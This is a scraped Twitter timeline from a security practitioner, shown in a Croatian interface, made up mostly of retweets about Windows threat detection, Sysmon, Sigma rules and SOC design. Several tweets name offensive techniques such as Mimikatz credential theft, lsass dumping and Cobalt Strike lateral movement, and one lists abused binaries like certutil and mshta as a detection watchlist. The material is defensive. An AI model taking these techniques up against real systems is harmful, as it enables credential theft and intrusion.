Tweetovi

Blokirali ste korisnika/cu @rimpq

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @rimpq

  1. Prikvačeni tweet
    9. pro 2019.

    ⚙️Account Logon Flow / Process () v0.1 📕[PDF]: 🔗[DIRECT]: ...for self understanding logon flow / process in windows system. Special thanks to Andrei Miroshnikov💪 "Find Evil – Know Normal"

    Poništi
  2. proslijedio/la je Tweet
    2. velj

    Need a Reference Architecture? Check out this one showing how technology enables this strategy/access model. Slide 14 of CISO Workshop Module 3

    Poništi
  3. proslijedio/la je Tweet
    2. velj
    Poništi
  4. proslijedio/la je Tweet
    1. velj
    Poništi
  5. proslijedio/la je Tweet
    31. sij

    Join me and on Tuesday, February 11th as we unveil 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI. Register for the webinar here (recording available afterwards):

    Poništi
  6. proslijedio/la je Tweet
    1. velj

    Like and ?! Then you’ll love our write up on how to integrate them.

    Poništi
  7. proslijedio/la je Tweet
    1. velj

    Some essential process execution/cmd lines to monitor for initial access/persist. powershell cmd rundll32 control wscript javaw csc regsvr32 reg certutil bitsadmin schtasks wmic eqnedt32 msiexec cmstp mshta hh curl installutil regsvcs/regasm at msbuild sc cscript msxsl runonce

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    1. velj
    Poništi
  9. proslijedio/la je Tweet
    31. sij

    Samples are packed with Themida ✉️ ☣️1.exe --> NuclearBot ⚛️ ☣️9.exe --> Infostealer 💰 ☣️4.exe --> downloads tor.exe and 2 AutoIt files (32.exe and 64.exe), possibly miner (I am still looking into it, process graph below)

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    31. sij

    Yearly reminder that by is awesome sauce 👌

    Poništi
  11. proslijedio/la je Tweet

    Cobalt Strike kit for Lateral Movement

    Poništi
  12. proslijedio/la je Tweet
    31. sij

    Was testing out Elastic 7.5.2. Not sure when a change was made to the behavior of fields that consist of arrays of keywords (like process.args)... This change 'breaks' a lot of the anticipated behaviors from previous versions for fields like process.args.

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    30. sij

    I've spent a whole day on Sigma Focus: Facilitate contributions - New Rule Creation Guide - New colorised test output - New test cases - Rule cleanup (title, date, ids) Next step: How-to guide for pull requests

    Poništi
  14. proslijedio/la je Tweet
    30. sij
    Poništi
  15. proslijedio/la je Tweet

    Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD

    Poništi
  16. proslijedio/la je Tweet
    30. sij

    in-memory traces of ppldump, exploiting zam64.sys vulndriver to dump lsass memory, cool stuff. sysmon will show a generic\noisy calltrace so detection chances here are low, if combined with lsass loading dbgcore.dll it may work.

    Poništi
  17. proslijedio/la je Tweet
    29. sij

    Need a SOC Reference Architecture? Check out this one we put together to show how Microsoft technology integrates into a SOC. Slide 73 of Azure Security Compass -

    Poništi
  18. proslijedio/la je Tweet
    30. sij

    A quick post on why you shouldn't use SYSTEM Tokens when you sandbox a process. Part 1 of N (where I haven't decided how big N is).

    Poništi
  19. proslijedio/la je Tweet
    29. sij
    Odgovor korisnicima i sljedećem broju korisnika:

    I finally got around to publishing my Sysmon deployment method. Hope people find it useful:

    Poništi
  20. proslijedio/la je Tweet
    29. sij

    AD Privilege Escalation Exploit: The Overlooked ACL

    Poništi
  21. proslijedio/la je Tweet

    1. Network segmentation 2. Host-based Firewalls 3. Windows Credential Guard/Exploit Guard 4. Applocker 5. Privilege Account Monitoring 6. EDR 7. Sandboxed Office365/Outlook 8. 2FA 9. AMSI 10. MSBuild/Powershell Monitoring

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·